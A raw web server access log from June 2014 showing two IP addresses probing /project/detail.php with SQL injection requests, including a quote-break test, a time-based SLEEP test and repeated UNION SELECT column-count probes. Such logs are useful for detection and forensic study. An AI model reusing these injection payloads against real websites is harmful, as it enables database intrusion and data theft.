83.143.133.12 - - [20/Jun/2014:08:06:35 -0400] "GET /project/detail.php?id=10'\" HTTP/1.1" 200 4143 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; elertz 2.4.179[128]; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)"
83.143.133.12 - - [20/Jun/2014:08:06:38 -0400] "GET /project/detail.php?id=10%20AnD%20SLeeP%283%29 HTTP/1.0" 200 4143 "-" "Opera/9.27"
86.107.43.19 - - [20/Jun/2014:11:04:02 -0400] "GET /project/detail.php?id=101111111111111%27%20UNION%20SELECT%20CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,55,45,81,45),CHAR(45,120,56,45,81,45),CHAR(45,120,57,45,81,45),CHAR(45,120,49,48,45,81,45),CHAR(45,120,49,49,45,81,45),CHAR(45,120,49,50,45,81,45),CHAR(45,120,49,51,45,81,45)%20--%20/*%20order%20by%20%27as%20/* HTTP/1.1" 200 4143 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; iebar; Sgrunt|V109|1746|S-1740532934|dialno; snprtz|dialno; .NET CLR 2.0.50727)"
83.143.133.12 - - [20/Jun/2014:08:06:36 -0400] "GET /project/detail.php?id=10 HTTP/1.0" 200 4664 "-" "Opera/9.27"
86.107.43.19 - - [20/Jun/2014:11:04:32 -0400] "GET /project/detail.php?id=101111111111111%22%20UNION%20SELECT%20CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,55,45,81,45),CHAR(45,120,56,45,81,45),CHAR(45,120,57,45,81,45),CHAR(45,120,49,48,45,81,45),CHAR(45,120,49,49,45,81,45),CHAR(45,120,49,50,45,81,45),CHAR(45,120,49,51,45,81,45),CHAR(45,120,49,52,45,81,45),CHAR(45,120,49,53,45,81,45),CHAR(45,120,49,54,45,81,45),CHAR(45,120,49,55,45,81,45),CHAR(45,120,49,56,45,81,45),CHAR(45,120,49,57,45,81,45),CHAR(45,120,50,48,45,81,45),CHAR(45,120,50,49,45,81,45),CHAR(45,120,50,50,45,81,45),CHAR(45,120,50,51,45,81,45),CHAR(45,120,50,52,45,81,45),CHAR(45,120,50,53,45,81,45)%20--%20/*%20order%20by%20%22as%20/* HTTP/1.1" 200 4143 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; dial"
157.55.39.178 - - [20/Jun/2014:11:01:28 -0400] "GET /robots.txt HTTP/1.1" 404 575 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
86.107.43.19 - - [20/Jun/2014:11:03:38 -0400] "GET /project/detail.php?id=101111111111111%20UNION%20SELECT%20CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,55,45,81,45),CHAR(45,120,56,45,81,45),CHAR(45,120,57,45,81,45),CHAR(45,120,49,48,45,81,45),CHAR(45,120,49,49,45,81,45),CHAR(45,120,49,50,45,81,45),CHAR(45,120,49,51,45,81,45),CHAR(45,120,49,52,45,81,45),CHAR(45,120,49,53,45,81,45),CHAR(45,120,49,54,45,81,45)%20--%20%20/* HTTP/1.1" 200 4143 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8"
86.107.43.19 - - [20/Jun/2014:11:04:20 -0400] "GET /project/detail.php?id=101111111111111%22%20UNION%20SELECT%20CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,55,45,81,45),CHAR(45,120,56,45,81,45)%20--%20/*%20order%20by%20%22as%20/* HTTP/1.1" 200 4143 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; iebar; acc=; YPC 3.2.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; IEMB3; IEMB3; yplus 5.1.04b)"
86.107.43.19 - - [20/Jun/2014:11:04:27 -0400] "GET /project/detail.php?id=101111111111111%22%20UNION%20SELECT%20CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,55,45,81,45),CHAR(45,120,56,45,81,45),CHAR(45,120,57,45,81,45),CHAR(45,120,49,48,45,81,45),CHAR(45,120,49,49,45,81,45),CHAR(45,120,49,50,45,81,45),CHAR(45,120,49,51,45,81,45),CHAR(45,120,49,52,45,81,45),CHAR(45,120,49,53,45,81,45),CHAR(45,120,49,54,45,81,45)%20--%20/*%20order%20by%20%22as%20/* HTTP/1.1" 200 4143 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; dial; SV1; .NET CLR 1.0.3705)"
